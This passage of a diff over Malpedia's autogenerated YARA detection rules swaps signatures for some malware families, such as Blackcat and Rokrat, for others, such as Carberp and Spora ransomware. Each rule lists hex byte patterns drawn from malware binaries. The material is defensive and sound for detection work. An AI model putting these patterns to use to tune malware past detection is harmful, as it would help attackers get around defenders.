} - $sequence_5 = { 4883c110 e8???????? 896e30 381f } - $sequence_6 = { 4883c10c e8???????? 488b4f28 488b5718 } - $sequence_7 = { 4883c110 48c741180f000000 33ed 48896910 408829 48c746500f000000 } - $sequence_8 = { 7ce0 488bce ff15???????? 8b0d???????? } - $sequence_9 = { ff15???????? 488bc8 ff15???????? ba0a000000 } - $sequence_10 = { 0b05???????? 8905???????? ff15???????? ff15???????? b9e8030000 8bd8 } - $sequence_11 = { 4c2bf3 8905???????? 493bf7 0f83c8000000 48896c2478 4c896c2430 41bd00f00000 } - $sequence_12 = { c705????????02000000 488905???????? 488d0556eb0100 48891d???????? 488905???????? 33c0 488905???????? } - $sequence_13 = { 8b05???????? 4d8bf4 2305???????? 4c03fe 4c2bf3 8905???????? } - $sequence_14 = { 4c8d35046c0100 49833cde00 7407 b801000000 eb5e } - $sequence_15 = { 8bd8 e8???????? 2bc3 3d70170000 7cf2 e8???????? } + $sequence_0 = { c745f000000000 ff15???????? 8bd0 c7461000000000 8bca c746140f000000 } + $sequence_1 = { 8bca c746140f000000 c60600 8d7901 } + $sequence_2 = { 99 b91a000000 f7f9 80c261 88143e 47 } + $sequence_3 = { 2bc6 48 50 56 } + $sequence_4 = { ba???????? 660fd645e0 e8???????? 83c404 } + $sequence_5 = { 48 3bc2 0f42d0 0fb6041a 03d3 } + $sequence_6 = { ff15???????? 6a00 85c0 744b } + $sequence_7 = { 50 e8???????? 8d0c3e 83c40c 3bf1 7410 0fb606 } + $sequence_8 = { 6a00 0f434d08 8bf0 6a00 } + $sequence_9 = { 0f57c0 c745dc00000000 68???????? ba???????? 660fd645d4 } + $sequence_10 = { c745f001000000 e8???????? c745e800000000 c745ec0f000000 c645d800 8d5001 } + $sequence_11 = { c745ec0f000000 c645d800 8d5001 8b4610 3bc2 726f } + $sequence_12 = { 0154241c 894104 e9???????? 8b44241c } + $sequence_13 = { 89542408 f7d0 0385e4fdffff 8995a4fbffff 8944240c } + $sequence_14 = { 00c1 83da03 2b54241c 0f8444230000 8b7c241c } + $sequence_15 = { 00c1 83db03 2b9d34fdffff 899d44fdffff } + $sequence_16 = { 00c2 83de03 2bb500ffffff 89b530ffffff } + $sequence_17 = { 00c1 83de03 29de 89b504feffff } + $sequence_18 = { 00c1 8d8510feffff 83da03 89442404 } + $sequence_19 = { 00c1 8b8300010000 83da03 29fa 7468 } condition: - 7 of them and filesize <557056 + 7 of them and filesize <487424 } -rule MALPEDIA_Elf_Blackcat_Auto : FILE +rule MALPEDIA_Win_Carberp_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8a7e13ba-9ed1-59ed-8fb9-9aaa610fbd94" + id = "ca3e7da8-ad9c-59f4-8614-8b1382409083" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.blackcat_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carberp_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "1ac97428ed273512eef4209d87a29f49ce26e88d11cb15b15e2f2687ea017381" - score = 60 - quality = 45 + logic_hash = "1e5a666bd6ef8c024c58bd150c2d57a0675cba836a8af1e051301be69118758b" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -168391,32 +171259,32 @@ rule MALPEDIA_Elf_Blackcat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 0f0b 90 90 90 90 53 } - $sequence_1 = { 69c0???????? c1e811 6bf064 29f2 0fb7d2 } - $sequence_2 = { e8???????? 0f0b 90 53 } - $sequence_3 = { 89c1 3d???????? 7319 c1e906 } - $sequence_4 = { 660f7f8424f0010000 660f7f8424e0010000 660f7f8424d0010000 660f7f8424c0010000 660f7f8424b0010000 } - $sequence_5 = { d1e9 01d1 c1e902 8d14cd00000000 } - $sequence_6 = { b801000000 81f9???????? 0f823fffffff b802000000 } - $sequence_7 = { 69c0???????? c1e810 29c2 0fb7d2 d1ea } - $sequence_8 = { 762a 0fb6c8 8d1489 8d0cd1 } - $sequence_9 = { e8???????? 0f0b e8???????? 0f0b 90 90 90 } + $sequence_0 = { b8???????? 50 6a00 50 e8???????? 8b4518 8945e4 } + $sequence_1 = { 68f5a40f7d 6a0d 6a00 e8???????? 68da6772c2 6a0d 6a00 } + $sequence_2 = { ff75fc 56 ff15???????? 8bf0 8d45f8 50 e8???????? } + $sequence_3 = { 0f848d000000 6683f832 0f8483000000 6683f821 0f8548010000 57 8d8588fdffff } + $sequence_4 = { 7407 50 e8???????? 59 ff45f4 8b45f4 3b45f0 } + $sequence_5 = { 668945f6 58 6a72 668945f8 58 6a5c 668945fa } + $sequence_6 = { ff7658 e8???????? 83c418 83665800 5e 5d c3 } + $sequence_7 = { 59 59 85f6 7419 ff7510 56 6a04 } + $sequence_8 = { 6800000040 ff7508 ffd0 8bf8 83ffff 7504 33c0 } + $sequence_9 = { c645f867 c645f96c c645fa57 c645fb6e c645fc64 885dfd 895dc8 } condition: - 7 of them and filesize <8011776 + 7 of them and filesize <491520 } -rule MALPEDIA_Win_Cookiebag_Auto : FILE +rule MALPEDIA_Win_Synflooder_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c260d983-1fb1-5187-bb1e-a30d172d6701" + id = "355e06d2-d319-5e82-9247-ae8f46ddbac0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cookiebag_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.synflooder_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "74595c8c00c27ebea5fcf6294fdb19b48126392d3364dc5a9bcc9f574cb25599" + logic_hash = "95bdce90d0fd23dc18864dd54db497d62acdb308355c11b707eb697b526800c1" score = 75 quality = 75 tags = "FILE" @@ -168430,32 +171298,32 @@ rule MALPEDIA_Win_Cookiebag_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8e39050000 8a442437 bf???????? 88442424 83c9ff 33c0 33ed } - $sequence_1 = { 51 8b4c2414 55 e8???????? 84c0 7412 8b442418 } - $sequence_2 = { 51 e8???????? 83c404 eb1d 8b4608 8b7604 3bf3 } - $sequence_3 = { 50 53 52 e8???????? 8bce e8???????? 8b4c2428 } - $sequence_4 = { 83c1fe 51 e8???????? 83c404 8b4c242c 897c243c 3bcf } - $sequence_5 = { e8???????? 68???????? e8???????? 83c404 8bd8 8dbe14010000 6a01 } - $sequence_6 = { 895c2428 e8???????? 84c0 7427 8b7c2418 8bcd } - $sequence_7 = { 85c0 7454 8b87dc000000 85c0 764a 8b44240c } - $sequence_8 = { e8???????? 83c414 b001 5f 5e c20400 5f } - $sequence_9 = { 6a01 8d4c241c c7442444ffffffff e8???????? 8b4c2438 64890d00000000 } + $sequence_0 = { ff35???????? ff15???????? 85c0 7442 8b7df4 85ff } + $sequence_1 = { 83e61f 8d3c8520fc4000 8b07 c1e606 } + $sequence_2 = { 750b 56 e8???????? 59 85c0 7407 } + $sequence_3 = { e8???????? 83c408 8b542420 52 68???????? e8???????? } + $sequence_4 = { 53 56 57 7408 33c0 40 e9???????? } + $sequence_5 = { c7465c20b04000 83660800 33ff 47 } + $sequence_6 = { 55 8bec 81ec98050000 a1???????? 33c5 8945fc 8d8568faffff } + $sequence_7 = { 8bf0 89742414 83feff 7524 68???????? e8???????? 83c404 } + $sequence_8 = { ff15???????? 83f8ff 7524 68???????? e8???????? 83c404 } + $sequence_9 = { 33db 85db 7466 8d45f4 50 ff75f8 53 } condition: - 7 of them and filesize <311296 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Gameover_P2P_Auto : FILE +rule MALPEDIA_Win_Electric_Powder_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f23c7d41-302b-54ee-89d3-a1fcd7481d37" + id = "6da8b24a-07fd-5fc6-a509-6cbc31d92594" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gameover_p2p_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.electric_powder_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "15df0db5593f1e0961da9a214002cfa7e3553ad059d6ba39628050e96c9953a2" + logic_hash = "38cd56e857c27f71ed9be956ee8235c5f49da7b5b360cadbe53a42a73ba8199e" score = 75 quality = 75 tags = "FILE" @@ -168469,32 +171337,32 @@ rule MALPEDIA_Win_Gameover_P2P_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b01 8975dc 85c0 740f ffb09c010000 8d45d4 50 } - $sequence_1 = { 8d873c010000 50 889f38010000 ffd6 } - $sequence_2 = { ba???????? 8d8d70fdffff e8???????? 85c0 0f95c0 84c0 7509 } - $sequence_3 = { 743f 53 8d442420 50 57 56 ff742428 } - $sequence_4 = { 7769 8a442412 0fb6c0 668901 8a442413 0fb6c0 66894102 } - $sequence_5 = { 7415 ff770c 8d442418 51 } - $sequence_6 = { e8???????? 8bf8 689a000000 8bd3 8bce 897c242c } - $sequence_7 = { b9a6000000 8d5588 e8???????? e8???????? 8bc8 e8???????? 8b750c } - $sequence_8 = { 85c0 7548 68???????? ff35???????? ffd6 85c0 7537 } - $sequence_9 = { f3ab 33db 6818010000 66ab 8d842410010000 53 50 } + $sequence_0 = { 3b4e08 0f8324010000 8b4604 c704c810000000 8b4608 83e801 8945fc } + $sequence_1 = { 03c0 660f289800904300 660f2835???????? 660f59cf 660f58d1 660f70caee f20f59d7 } + $sequence_2 = { 8d8d20fdffff c78530fdffff00000000 c78534fdffff0f000000 c68520fdffff00 e8???????? c745fc00000000 8d8d20fdffff } + $sequence_3 = { 7202 8b39 8b4110 85c0 7449 48 83ceff } + $sequence_4 = { 0f8389010000 8b5604 3bc8 0f8388010000 8b44fa04 8944ca04 } + $sequence_5 = { c645fc20 51 8bd0 8d8d78fcffff e8???????? 83c404 68???????? } + $sequence_6 = { 50 51 8d8d68faffff e8???????? 83bd7cfaffff08 8d8568faffff } + $sequence_7 = { 7202 8b3f 83fa08 731a } + $sequence_8 = { 83c404 89b518efffff 85f6 0f84be000000 8b8d40efffff 03c9 } + $sequence_9 = { 83f8ff 773b 83f8ef 7736 8b4f04 83c010 50 } condition: - 7 of them and filesize <598016 + 7 of them and filesize <565248 } -rule MALPEDIA_Win_Satellite_Turla_Auto : FILE +rule MALPEDIA_Win_Spora_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "79b83503-3c79-5740-8814-f6490a13be5c" + id = "8b8ba74c-729e-5b95-8216-285cfd8906d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satellite_turla_auto.yar#L1-L160" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spora_ransom_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "5508d48c958832fbb5bd1d9983eb0158b4a79197acb610f43056e5475e8173ec" + logic_hash = "4f4859e5c4c90863719bd127457464f7d14cd9fd2e5234c00f8157e8748b1142" score = 75 quality = 75 tags = "FILE" @@ -168508,38 +171376,32 @@ rule MALPEDIA_Win_Satellite_Turla_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0105???????? 81c3b0020000 2945e0 75ae 837dd400 } - $sequence_1 = { 51 8d9514fbffff 52 a1???????? } - $sequence_2 = { 0108 833e00 7fc7 db46fc } - $sequence_3 = { 0105???????? 83c410 29442418 75a9 } - $sequence_4 = { 0108 833e00 7c1f 8b542410 } - $sequence_5 = { 0105???????? 83c410 29442420 75aa } - $sequence_6 = { 0108 833a00 7c23 8b442428 } - $sequence_7 = { 0108 833e00 7cc7 7e39 } - $sequence_8 = { c645da14 c645db14 e8???????? 83c40c 8d45d0 } - $sequence_9 = { c645de47 c645df5b c645e04d c645e160 c645e249 c645e346 c645e44c } - $sequence_10 = { 6a0a 50 e8???????? 83c40c 8d45f4 885dfd 50 } - $sequence_11 = { 8d7da0 f3ab 8d459c 50 ff15???????? } - $sequence_12 = { 3bf8 72ee 6880000000 56 ff15???????? } - $sequence_13 = { c645ac05 c645ad07 c645ae07 c645af0b c645b004 c645b10e c645b226 } - $sequence_14 = { 7506 46 47 3bf8 } - $sequence_15 = { 6a55 8d45b8 6a0c 50 c645b816 } + $sequence_0 = { 6a3a 8d4641 668945f0 58 ff7510 668945f2 ff750c } + $sequence_1 = { f6c301 742c 6a3a 8d4641 668945f0 58 ff7510 } + $sequence_2 = { 897df4 85ff 747a 834d08ff } + $sequence_3 = { 834d08ff 8d45f8 50 57 8d4508 50 } + $sequence_4 = { 8d4641 668945f0 58 ff7510 668945f2 ff750c 33c0 } + $sequence_5 = { 33c0 668945f4 8d45f0 50 ff15???????? 50 8d45f0 } + $sequence_6 = { 0fb600 48 50 ff36 ff15???????? 85c0 } + $sequence_7 = { c745c800040000 33f6 8d45c4 50 ff15???????? 85c0 750e } + $sequence_8 = { 50 ff15???????? 85c0 7466 56 57 bf00020000 } + $sequence_9 = { 0bf0 57 ff15???????? 5f 8bc6 } condition: - 7 of them and filesize <1040384 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Nosu_Auto : FILE +rule MALPEDIA_Win_Jimmy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d0493836-076e-53ac-80d2-093749a42975" + id = "6665c46a-fce5-5107-8692-d73430db94ca" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nosu_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jimmy_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "8ab8c6afe29bf167cf16b426bd8eca0dcd4e462cdef53cd757a920fd1f6ec318" + logic_hash = "5955b25aaac6bf582c8efb23dc58fc592d4dcf4b96826a166327d6d4b0ee873a" score = 75 quality = 75 tags = "FILE" @@ -168553,32 +171415,32 @@ rule MALPEDIA_Win_Nosu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d4730 50 ff15???????? 03c0 8d5730 50 } - $sequence_1 = { 399628040000 7438 399648010000 7430 3996b8020000 7428 8b8e48060000 } - $sequence_2 = { 8bcf 8938 e8???????? 894500 85c0 } - $sequence_3 = { e8???????? 59 85c0 7444 8b7c2410 bd???????? 55 } - $sequence_4 = { 0f45cf 03ce 84c0 8b4508 51 ff742420 0f45d7 } - $sequence_5 = { 7462 803b22 0f85d4010000 8d470c 50 8d5708 8d4c2418 } - $sequence_6 = { 53 50 53 a5 8d942440080000 53 53 } - $sequence_7 = { 8b442434 59 c60004 8b442430 c640010e } - $sequence_8 = { 50 8d8e280a0000 e8???????? 59 8d442468 50 8d442424 } - $sequence_9 = { 8d96a8000000 8d4e48 e8???????? 59 59 84c0 742c } + $sequence_0 = { 8908 eb11 e8???????? 8945f4 ff75f8 e8???????? 59 } + $sequence_1 = { 8b4508 83602c00 8b45fc c9 c3 55 8bec } + $sequence_2 = { 89814c010000 eb27 a1???????? 8b4de4 898840010000 ff75e4 } + $sequence_3 = { ff7508 ff55fc 59 59 c9 c3 55 } + $sequence_4 = { 6a73 58 668945f2 6a20 58 668945f4 6a25 } + $sequence_5 = { 8b4508 ff702c 8b4508 ff7024 e8???????? 59 59 } + $sequence_6 = { 50 8d45c4 50 8b4508 83c008 50 6a00 } + $sequence_7 = { 85c0 7419 8b45fc 0fbe00 8b4df8 0fbe09 } + $sequence_8 = { e8???????? 59 b001 c9 c20800 } + $sequence_9 = { 6a09 e8???????? 59 59 8945fc ff7510 ff750c } condition: - 7 of them and filesize <513024 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Unidentified_070_Auto : FILE +rule MALPEDIA_Win_Duuzer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7ae3ca74-0486-51ae-ba4c-20ff0ab01fe5" + id = "df8c3768-3cdc-5b0e-a660-661bdb978bfa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_070_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.duuzer_auto.yar#L1-L145" license_url = "N/A" - logic_hash = "bd634ade531926df7fb9636e5fb1e66cb3297f9900a01fa2493788383a51b75e" + logic_hash = "13aac089d76bc4f63a9fe69893726cbd97eb78875b3161a00634aa641d0ec8d3" score = 75 quality = 75 tags = "FILE" @@ -168592,32 +171454,37 @@ rule MALPEDIA_Win_Unidentified_070_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a04 50 ff15???????? 8945fc 85c0 } - $sequence_1 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 } - $sequence_2 = { 33c0 c20400 3b0d???????? 7502 } - $sequence_3 = { 6a00 6a04 50 ff15???????? 8945fc } - $sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 } - $sequence_5 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc } - $sequence_6 = { 6a00 6a00 6a04 50 ff15???????? 8945fc } - $sequence_7 = { 6a00 8d45f4 50 ff75fc 57 56 } - $sequence_8 = { 8bf9 c78424cc00000000000000 66c78424d00000000010 e8???????? 83c40c 8d442424 50 } - $sequence_9 = { 6a00 56 ff15???????? 8945f8 85c0 0f8493000000 6a00 } + $sequence_0 = { 83f804 7408 83c8ff e9???????? } + $sequence_1 = { 0145f0 1155f4 85c9 7533 } + $sequence_2 = { 57 4154 4155 4881ec88080000 488b05???????? 4833c4 } + $sequence_3 = { 00f4 c640001c c740008a460323 d188470383ee } + $sequence_4 = { 56 57 b830910000 e8???????? } + $sequence_5 = { 56 57 b8a0010100 e8???????? } + $sequence_6 = { 56 57 488dac2410fcffff 4881ecf0040000 } + $sequence_7 = { 01442410 3bfb 75c4 8b4630 } + $sequence_8 = { 57 4154 4883ec20 448be2 } + $sequence_9 = { 57 4154 4155 4156 4883ec30 488b05???????? } + $sequence_10 = { 014dec 83bf8400000000 7708 398780000000 } + $sequence_11 = { 57 4154 4155 4883ec20 33f6 488bd9 } + $sequence_12 = { 014dec 66837dec00 0f8efc010000 0fbf45ec } + $sequence_13 = { 00e0 3541000436 41 0023 } + $sequence_14 = { 010b 014e4c 014e48 014e54 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <491520 } -rule MALPEDIA_Win_Clipog_Auto : FILE +rule MALPEDIA_Win_Karma_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "46aafcb1-e1b8-5042-a65a-96aaea69b545" + id = "7f63a996-b29b-562f-996a-826393522cf0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clipog_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karma_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "d53a5689475b1eada9174cbb0eba62d34ac88574fbde919bc04ba3774f961a03" + logic_hash = "2f60ce68960b60e178a1e413eabfae876f08564938fc3ab9af48ba4bf8caac6e" score = 75 quality = 75 tags = "FILE" @@ -168631,32 +171498,32 @@ rule MALPEDIA_Win_Clipog_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744242880000000 c744242004000000 4533c9 418d5104 458d4101 ff15???????? 48898710180000 } - $sequence_1 = { 4c8bea 4b8b8cf7907c0200 4c8b15???????? 4883cfff 418bc2 498bd2 4833d1 } - $sequence_2 = { 83c7f8 81ffd6000000 0f87eb030000 488d1531c5ffff 0fb6843a24410000 8b8c824c400000 4803ca } - $sequence_3 = { 48895808 48896810 48897018 48897820 4156 33ed 4c8d352e910000 } - $sequence_4 = { 4c8d0d13210100 8bf9 488d150a210100 b907000000 4c8d05f6200100 e8???????? } - $sequence_5 = { eb7a 488d0dd0140200 e8???????? 85c0 0f94c0 eb67 } - $sequence_6 = { 488d15b6e80100 e9???????? 488d15bae80100 e9???????? } - $sequence_7 = { 488d1585ee0000 488d0d76ee0000 e8???????? 0fb605???????? } - $sequence_8 = { e9???????? 4c8d256b4e0100 8bee 498bc4 41bf01000000 } - $sequence_9 = { f20f1000 8b7808 e9???????? 488d05ae920100 4a8b0ce8 42f644313880 } + $sequence_0 = { 8b7f08 8bc7 d3e8 8b4d08 } + $sequence_1 = { 8bf9 8955f0 33c0 663907 7408 40 66833c4700 } + $sequence_2 = { 0f1006 0f114318 e8???????? 5f } + $sequence_3 = { ebc5 33ff 6690 0fb78ffc434000 } + $sequence_4 = { ff15???????? 6a00 8d442444 50 6800710200 } + $sequence_5 = { 660fefc8 0f1148f0 83e901 75e7 8d55e0 } + $sequence_6 = { 894dfc 894dc0 894dc4 894dc8 894dcc } + $sequence_7 = { 8b4c2418 8b44241c 83c140 6a00 6a00 83d000 } + $sequence_8 = { 8d4e20 0f47ce 2bca 750e 6685db 0f84c5000000 } + $sequence_9 = { 66833c45f051400000 75f4 33d2 663915???????? 7415 660f1f840000000000 } condition: - 7 of them and filesize <372736 + 7 of them and filesize <49208 } -rule MALPEDIA_Win_Rokrat_Auto : FILE +rule MALPEDIA_Win_Pgift_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "529b23ea-5ccb-5314-a032-246562122609" + id = "77b72e7a-f170-5cb6-9a32-dd868251e29f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rokrat_auto.yar#L1-L152" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pgift_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "99c55c71740e0234c84ec3f4624ede5be8b8eb4baac41c4a1538d8db05d1af41" + logic_hash = "5fec76c05b43d836fa9681344d4e2173c2fdd272e3aa573e02794115bc07ca47" score = 75 quality = 75 tags = "FILE" @@ -168670,38 +171537,32 @@ rule MALPEDIA_Win_Rokrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 6a04 33c0 } - $sequence_1 = { 50 8bcf e8???????? 8d4538 3bd8 } - $sequence_2 = { 50 0fb74208 c1e910 51 50 } - $sequence_3 = { 50 8bcb e8???????? 8d4550 } - $sequence_4 = { 50 e8???????? 8d8edc000000 8d4520 } - $sequence_5 = { 56 8d4dc0 c745d000000000 668945c0 e8???????? c645fc03 8b45bc } - $sequence_6 = { 50 ff15???????? e8???????? 40 } - $sequence_7 = { 51 50 0fb74212 50 } - $sequence_8 = { 770a 68???????? e8???????? 837e1408 } - $sequence_9 = { ff15???????? 50 e8???????? 59 6a64 } - $sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 } - $sequence_11 = { c145f41e 8b5dfc 8db4339979825a 8975fc } - $sequence_12 = { c145f01e 8db4339979825a 8975f4 8b772c } - $sequence_13 = { c145f41e 8d9c3bd6c162ca 8b792c 337924 } - $sequence_14 = { c145f41e 8d8c0bdcbc1b8f 894dfc 8bca } - $sequence_15 = { c145f41e 8d9c1fd6c162ca 8b793c 337930 } + $sequence_0 = { 53 ff7508 e8???????? 83450804 83c304 } + $sequence_1 = { 2bc8 c1f902 7454 50 8d4de8 } + $sequence_2 = { 50 0fb745d4 50 8d45ec ff760c } + $sequence_3 = { 8d4df0 c645fc02 e8???????? ff750c } + $sequence_4 = { 83f8ff 741e 53 50 8d4de8 e8???????? ff75e8 } + $sequence_5 = { 8d4df0 ff3498 e8???????? 83f8ff } + $sequence_6 = { 33db 8d4dec 895dfc e8???????? 8d8dd0feffff 895de8 e8???????? } + $sequence_7 = { c645fc03 897e38 897e34 897e30 e8???????? 3bc7 } + $sequence_8 = { ff7634 53 50 e8???????? 83c40c 8d4638 } + $sequence_9 = { 8d4de8 e8???????? 6a5c 8d4de8 c645fc01 } condition: - 7 of them and filesize <2932736 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Icondown_Auto : FILE +rule MALPEDIA_Win_Oddjob_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5fb05a25-c3d8-5c59-95d8-0506e8a3c86e" + id = "05ff5b48-0b07-5c37-b3fa-78979fc46d1b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icondown_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oddjob_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "0c8c45a1ce9a6284204f7a9a1969d67da5f4271a6aa51c70c6faebd789509deb" + logic_hash = "cba635f9b22031c02deb6504fbb70476906689529cb50c775ead5481738df2df" score = 75 quality = 75 tags = "FILE" @@ -168715,32 +171576,32 @@ rule MALPEDIA_Win_Icondown_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89442420 8b471c d1ee 52 50 83e601 } - $sequence_1 = { 5f 5e 5d b801000000 5b c20400 8b461c } - $sequence_2 = { 3bc5 7c10 5f 5e 5d b8feffffff 5b } - $sequence_3 = { 8b461c 85c0 0f8476010000 8b868c000000 } - $sequence_4 = { 0fb6da f683c11c450004 7406 8816 46 40 ff01 } - $sequence_5 = { b81f85eb51 f7e9 c1fa05 8bca b81f85eb51 c1e91f } - $sequence_6 = { 56 8bf1 33db 57 8975f0 895dec c745e8a4ff4300 } - $sequence_7 = { e8???????? c7462844d04300 833d????????00 7416 } - $sequence_8 = { c3 33c0 5e c3 8b442404 c74050f0b94400 } - $sequence_9 = { c745f020d04300 c745e810000000 e8???????? 85c0 7403 } + $sequence_0 = { e8???????? 59 8d9530ffffff 6a01 8bcb 8bc2 } + $sequence_1 = { c68552fbffff43 c68553fbffff5e c68554fbffff5b c68555fbffff8b c68556fbffff4b } + $sequence_2 = { 663d3600 751f 66837f0234 7518 } + $sequence_3 = { 50 bf???????? 57 6a04 53 68???????? ffd6 } + $sequence_4 = { 8bc3 4b 85c0 0f8498000000 0fb7c1 83f841 7c05 } + $sequence_5 = { c68596faffff24 c68597faffff08 c68598faffff8b c68599faffff43 } + $sequence_6 = { c685f8f9ffff40 c685f9f9ffff68 889dfaf9ffff c685fbf9ffff10 889dfcf9ffff 889dfdf9ffff c685fef9ffff51 } + $sequence_7 = { 889d12f8ffff 889d13f8ffff 889d14f8ffff 889d15f8ffff 889d16f8ffff 889d17f8ffff 889d18f8ffff } + $sequence_8 = { 85c0 7503 897dfc 397de8 7409 ff75e8 ff15???????? } + $sequence_9 = { 53 68???????? ffd6 85c0 741c 8d85a094ffff } condition: - 7 of them and filesize <5505024 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Poldat_Auto : FILE +rule MALPEDIA_Win_Jripbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a4b71e9b-caa3-5e09-abcb-8fc111c1e88a" + id = "7b1d247f-7cbb-5615-a25c-7a029e86230e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat" - source_url = 